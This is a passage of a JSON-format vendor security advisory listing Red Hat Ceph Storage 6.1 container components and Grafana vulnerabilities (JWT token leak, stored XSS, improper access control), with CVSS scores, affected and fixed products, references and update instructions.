"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le" }, "product_reference": "rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x" }, "product_reference": "rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64" }, "product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x" }, "product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le" }, "product_reference": "rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le" }, "product_reference": "rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x" }, "product_reference": "rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64" }, "product_reference": "rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le" }, "product_reference": "rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x" }, "product_reference": "rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" }, "product_reference": "rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Grafana Security Team" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2023-1387", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "discovery_date": "2023-04-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2186322" } ], "notes": [ { "category": "description", "text": "A flaw was found in Grafana. This flaw allows a remote, authenticated attacker to obtain sensitive information caused by an issue when enabling the \"url_login\" configuration option. By sending a specially crafted request, an attacker can obtain JWT information and use this to launch further attacks against the affected system.", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: JWT token leak to data source", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-1387" }, { "category": "external", "summary": "RHBZ#2186322", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2186322" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-1387", "url": "https://www.cve.org/CVERecord?id=CVE-2023-1387" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-1387", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1387" }, { "category": "external", "summary": "https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/", "url": "https://grafana.com/blog/2023/04/26/grafana-security-release-new-versions-of-grafana-with-security-fixes-for-cve-2023-28119-and-cve-2023-1387/" }, { "category": "external", "summary": "https://grafana.com/security/security-advisories/cve-2023-1387/", "url": "https://grafana.com/security/security-advisories/cve-2023-1387/" } ], "release_date": "2023-04-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: JWT token leak to data source" }, { "cve": "CVE-2023-1410", "cwe": { "id": "CWE-79", "name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)" }, "discovery_date": "2023-03-23T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2181117" } ], "notes": [ { "category": "description", "text": "A flaw was found in Grafana. This flaw allows an attacker to host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker-controlled XSS payload will be executed.", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: Stored XSS in Graphite FunctionDescription tooltip", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-1410" }, { "category": "external", "summary": "RHBZ#2181117", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2181117" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-1410", "url": "https://www.cve.org/CVERecord?id=CVE-2023-1410" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410" }, { "category": "external", "summary": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76", "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76" }, { "category": "external", "summary": "https://grafana.com/blog/2023/03/22/grafana-security-release-new-versions-with-security-fixes-for-cve-2023-1410/", "url": "https://grafana.com/blog/2023/03/22/grafana-security-release-new-versions-with-security-fixes-for-cve-2023-1410/" } ], "release_date": "2023-03-22T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: Stored XSS in Graphite FunctionDescription tooltip" }, { "acknowledgments": [ { "names": [ "Grafana Security Team" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2023-2183", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "discovery_date": "2023-05-29T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2210848" 